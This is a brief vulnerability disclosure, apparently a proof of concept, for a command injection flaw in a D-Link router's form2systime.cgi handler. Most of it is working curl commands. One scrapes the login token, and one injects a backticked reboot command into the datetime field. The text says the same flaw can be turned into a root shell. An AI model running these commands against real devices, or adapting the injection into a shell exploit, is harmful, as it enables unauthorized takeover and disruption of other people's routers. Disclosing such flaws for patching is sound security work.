-
Manufacturer's address:https://www.dlink.com/
-
Firmware download address : http://tsd.dlink.com.tw/GPL.asp
The picture above shows the latest firmware for this version
In /goform/form2systime.cgi, the Command injection vulnerability only needs to be met by datetime -:
First you need to get the tokenid
curl http://192.168.0.1/dir_login.asp | grep tokenid
Next, run the following poc, you can see that the router is restarted
curl -i -X POST http://192.168.0.1/goform/form2systime.cgi -d tokenid=xxxxx -d 'datetime=`reboot`-:'Finally, exp can be written to achieve the effect of obtaining a root shell